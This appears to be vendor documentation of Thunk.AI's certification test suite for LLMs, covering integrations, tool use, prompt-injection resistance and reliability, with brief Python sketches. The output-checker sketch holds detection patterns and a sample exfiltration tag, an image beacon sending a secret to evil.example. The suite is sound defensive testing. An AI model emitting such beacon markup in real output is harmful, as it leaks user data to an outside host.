Large language models (LLMs) are probabilistic by nature. Different models from different providers behave differently, and the same model can behave inconsistently across contexts. A model that performs well in general conversation may fail to use tools correctly, follow structured instructions, or handle edge cases predictably in a business workflow.
To ensure that a given LLM can support the reliability requirements of the Thunk.AI platform, every model undergoes a structured certification process before it is made available for use.
What is LLM Certification?
LLM certification is a test suite that validates whether a model can correctly perform the full range of operations required by Thunk.AI workflows, from reading documents and executing tools to resisting prompt injection and recovering gracefully from errors.
A model is certified for use on the platform when it passes the test suite with near-perfect accuracy.
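The certification gate can be pictured as a simple pass-rate check against a high threshold. This is a minimal sketch only: the threshold value, result format, and function names are illustrative assumptions, not Thunk.AI's actual criteria.

```python
# Hypothetical sketch of a certification gate: a model is certified only if its
# pass rate on the required test suite meets a near-perfect threshold.
# The 0.99 threshold and the result format are illustrative assumptions.

def certify(results: dict[str, bool], threshold: float = 0.99) -> bool:
    """results maps test-case IDs to pass/fail outcomes."""
    if not results:
        return False  # an empty run certifies nothing
    pass_rate = sum(results.values()) / len(results)
    return pass_rate >= threshold

# A model that misses one case out of 200 still clears a 0.99 bar:
outcomes = {f"case_{i}": True for i in range(200)}
outcomes["case_7"] = False
print(certify(outcomes))  # 199/200 = 0.995 -> True
```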
Depending on the customer scenario, certain features may not be required. In those cases, the corresponding tests are omitted from the certification run.
The test suite continues to evolve as new platform features are introduced.
Test Categories
1. Cloud Storage & Document Integrations
Validates that the agent can create, read, update, and move files across Google Drive, Microsoft OneDrive, Google Sheets, Excel workbooks, and Google Docs. Covers folder creation, file uploads, moving and copying between folders, writing formulas and raw values to sheets, appending to documents, and handling invalid paths or hostnames gracefully.
2. Content Reading & URL Extraction
Tests the agent's ability to fetch and process content from a wide range of sources: public URLs, Google Drive and OneDrive links, email attachments, Thunk memory nodes, PDFs, HTML pages (including JavaScript-rendered content), and various file types including receipts, spreadsheets, and documents. Validates that content is correctly extracted and usable by the agent.
3. Security & Prompt Injection
Tests that the system resists prompt injection and data exfiltration. Output checker unit tests detect malicious HTML while allowing legitimate content. Direct injection tests verify the agent resists injection via row names, descriptions, and chained instructions. End-to-end integration tests run the full agent loop with injected content to ensure unsafe output is blocked before it reaches the user.
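To make the output-checker idea concrete, here is a minimal sketch of the kind of unit test this category describes: flag HTML constructs commonly used for exfiltration while letting plain formatting through. The patterns and function name are illustrative assumptions, not Thunk.AI's actual ruleset.

```python
import re

# Hypothetical sketch of an output checker: reject script tags, inline event
# handlers, and remote images (a common exfiltration beacon), but allow
# ordinary formatting. Patterns are illustrative, not the real ruleset.
UNSAFE_PATTERNS = [
    re.compile(r"<script\b", re.IGNORECASE),
    re.compile(r"\bon\w+\s*=", re.IGNORECASE),                    # inline event handlers
    re.compile(r"<img\b[^>]*src=[\"']https?://", re.IGNORECASE),  # remote image beacons
]

def is_output_safe(html: str) -> bool:
    return not any(p.search(html) for p in UNSAFE_PATTERNS)

print(is_output_safe("<b>Quarterly totals</b>"))                         # legitimate -> True
print(is_output_safe('<img src="https://evil.example/x?d=secret">'))     # exfiltration -> False
```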
4. Workflow & Routing
Tests email and webhook routing logic: creating new rows from incoming messages, matching to existing rows, custom routing instructions, and adds-only vs. updates-only behavior. Also covers workflow planning from documents, images, spreadsheets, and task lists, as well as playbook execution for common scenarios such as product launches, records digitization, and support ticket processing.
5. Agent Loop & Tool Execution
Tests the core agent loop: tool availability and constraints, recovery from invalid tool calls, batching multiple tool calls, and tool call history. Covers ToolBuilder (adding and fixing tools), MCP server integration, and custom AI tools including composite tools, circular call prevention, and approval flows.
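The "recovery from invalid tool calls" behavior can be sketched as a bounded retry loop: when the model emits a bad call, the error is fed back and the model must correct itself within a turn budget. The names here (`run_tool`, `agent_loop`) are hypothetical stand-ins for the real agent loop.

```python
# Hypothetical sketch of what a recovery test checks: the loop surfaces tool
# errors back to the model and requires a valid call within max_turns.
# All names and the toy "lookup" tool are illustrative assumptions.

def run_tool(name: str, args: dict) -> str:
    if name != "lookup" or "key" not in args:
        raise ValueError(f"invalid call: {name}({args})")
    return f"value-for-{args['key']}"

def agent_loop(model_step, max_turns: int = 3) -> str:
    feedback = None
    for _ in range(max_turns):
        name, args = model_step(feedback)
        try:
            return run_tool(name, args)
        except ValueError as err:
            feedback = str(err)  # feed the error back so the model can retry
    raise RuntimeError("model failed to recover within turn budget")

# A model that fixes its call after seeing the error passes:
calls = iter([("lookup", {}), ("lookup", {"key": "42"})])
print(agent_loop(lambda feedback: next(calls)))  # value-for-42
```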
6. Step & Task Management
Tests step lifecycle and human-in-the-loop flows: assigning steps by name, email, or role; scheduled work; approval requests; conversation drafts and auto-responses; wait-for-conversation behavior; autocomplete; and assignee and owner visibility.
7. Data Operations & Lookups
Tests sheet and Excel lookups, CSV and XLSX imports, data collection from Drive images, updating AI and non-AI columns, doc collection search and folder-based population, and property binding visibility.
8. Intelligence & Suggestions
Tests the suggestion system that helps users configure workflows correctly: detecting contradictions, identifying missing input bindings (such as a ticket link or customer name the agent needs but hasn't been given), validating extracted data against expected outputs, and checking consistency between input properties and checker outputs.
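A missing-input-binding check of this kind can be sketched as a diff between the placeholders an instruction references and the bindings actually supplied. The `{{name}}` placeholder syntax and function name are illustrative assumptions, not the platform's actual binding format.

```python
import re

# Hypothetical sketch of a missing-binding check: collect every placeholder
# referenced in the instructions and report any with no supplied binding.
# The {{name}} syntax is an illustrative assumption.

def missing_bindings(instructions: str, bindings: dict) -> set[str]:
    referenced = set(re.findall(r"\{\{(\w+)\}\}", instructions))
    return referenced - bindings.keys()

step = "Open {{ticket_link}} and greet {{customer_name}} by name."
print(missing_bindings(step, {"ticket_link": "https://example.test/t/1"}))
# {'customer_name'} -> surfaced to the user as a suggestion
```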
9. Research & Web Search
Tests the agent's ability to use web search and external tools for research tasks across a range of domains. Also covers Google Maps integration, document collection queries, and link shortening across drive files, email attachments, and external artifacts.
10. Edge Cases & Reliability
Tests error handling and boundary conditions: file attachment size warnings, meaningful error messages for invalid Drive and OneDrive URLs, multi-block instruction handling, data context preservation across instruction blocks, timeout behavior, and browser concurrency limits.
